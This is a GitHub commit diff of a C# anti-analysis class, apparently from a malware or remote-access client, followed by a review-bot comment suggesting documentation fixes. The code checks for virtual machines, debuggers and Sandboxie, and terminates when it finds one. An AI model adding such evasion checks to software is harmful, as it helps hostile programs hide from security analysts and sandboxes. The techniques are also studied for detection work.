Commented out Unimplemented methods

Will probably add these methods at a later date once they have been updated to work with this version
MrDevBot 2019-05-21 19:35:37 +10:00 committed by GitHub
parent 0e5870a795
commit 34c8a05752
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -1,7 +1,7 @@
using System; using System;
using System.Diagnostics; using System.Diagnostics;
using System.Linq; using System.Linq;
using System.Management; using System.Management;
using System.Net.NetworkInformation; using System.Net.NetworkInformation;
using System.Runtime.InteropServices; using System.Runtime.InteropServices;
@ -12,125 +12,125 @@ using System.Runtime.InteropServices;
// This program is distributed for educational purposes only. // This program is distributed for educational purposes only.
namespace Client.Helper namespace Client.Helper
{ {
class Anti_Analysis class Anti_Analysis
{ {
private static long GB_50 = 50000000000; private static long GB_50 = 50000000000;
public static void RunAntiAnalysis() public static void RunAntiAnalysis()
{ {
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie()) if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
Environment.FailFast(null); Environment.FailFast(null);
} }
internal static bool SmallHDD() internal static bool SmallHDD()
{ {
// Method One - main drive smaller than 50gb, likely a VM // Method One - main drive smaller than 50gb, likely a VM
long driveSize = Methods.GetMainDriveSize(); long driveSize = Methods.GetMainDriveSize();
if (driveSize <= GB_50 * 2) if (driveSize <= GB_50 * 2)
return true;
// Method Two - has common card of virtual machine
if (HasVMCard())
return true;
// Method Three - checks for vm drivers
if (HasVBOXDriver())
return true;
// Method Four - if machine has been on for less than 5 mins
if (GetUptime() < TimeSpan.FromMinutes(5))
return true; return true;
// Method Two - has common card of virtual machine
//if (HasVMCard())
//return true;
// Method Three - checks for vm drivers
if (HasVBOXDriver())
return true;
// Method Four - if machine has been on for less than 5 mins
//if (GetUptime() < TimeSpan.FromMinutes(5))
//return true;
// Method Five - has VM mac address // Method Five - has VM mac address
if (HasVMMac()) if (HasVMMac())
return true; return true;
return false; return false;
} }
private static bool HasVMMac() private static bool HasVMMac()
{ {
var macAddr = var macAddr =
( (
from nic in NetworkInterface.GetAllNetworkInterfaces() from nic in NetworkInterface.GetAllNetworkInterfaces()
where nic.OperationalStatus == OperationalStatus.Up where nic.OperationalStatus == OperationalStatus.Up
select nic.GetPhysicalAddress().ToString() select nic.GetPhysicalAddress().ToString()
).FirstOrDefault(); ).FirstOrDefault();
var macs = new[] var macs = new[]
{ {
"00-05-69", "00-05-69",
"00:05:69", "00:05:69",
"000569", "000569",
"00-50-56", "00-50-56",
"00:50:56", "00:50:56",
"005056", "005056",
"00-0C-29", "00-0C-29",
"00:0C:29", "00:0C:29",
"000C29", "000C29",
"00-1C-14", "00-1C-14",
"00:1C:14", "00:1C:14",
"001C14", "001C14",
"08-00-27", "08-00-27",
"08:00:27", "08:00:27",
"080027", "080027",
}; };
foreach (string mac in macs) foreach (string mac in macs)
{ {
if (mac == macAddr) if (mac == macAddr)
return true; return true;
} }
return false; return false;
} }
private static bool DetectVirtualMachine() private static bool DetectVirtualMachine()
{ {
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem")) using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
{ {
using (var items = searcher.Get()) using (var items = searcher.Get())
{ {
foreach (var item in items) foreach (var item in items)
{ {
string manufacturer = item["Manufacturer"].ToString().ToLower(); string manufacturer = item["Manufacturer"].ToString().ToLower();
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL"))
|| manufacturer.Contains("vmware") || manufacturer.Contains("vmware")
|| item["Model"].ToString() == "VirtualBox") || item["Model"].ToString() == "VirtualBox")
{ {
return true; return true;
} }
} }
} }
} }
return false; return false;
} }
private static bool DetectDebugger() private static bool DetectDebugger()
{ {
bool isDebuggerPresent = false; bool isDebuggerPresent = false;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent); CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent; return isDebuggerPresent;
} }
private static bool DetectSandboxie() private static bool DetectSandboxie()
{ {
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0) if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true; return true;
else else
return false; return false;
} }
[DllImport("kernel32.dll")] [DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName); public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent); static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
} }
} }
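Review bot: The comment kept at the top of `SmallHDD()` says a main drive "smaller than 50gb" is treated as a VM, but the condition is `driveSize <= GB_50 * 2`, i.e. 100,000,000,000 bytes, so the documented threshold is half the one the code applies. The comment should state the value that actually runs, e.g. `// Method One - main drive of 100 GB (decimal) or less`, so that a reader, including an analyst sizing an analysis VM, sees the real condition. With Method Two and Method Four commented out here, the name `SmallHDD` also no longer describes the method, which now covers disk size, `HasVBOXDriver()` and `HasVMMac()`; a one-line summary above it listing the checks still active would fix that. `HasVBOXDriver()` is still called but its definition is not visible in this section, so whether it belongs to the unimplemented methods the title refers to cannot be confirmed from here.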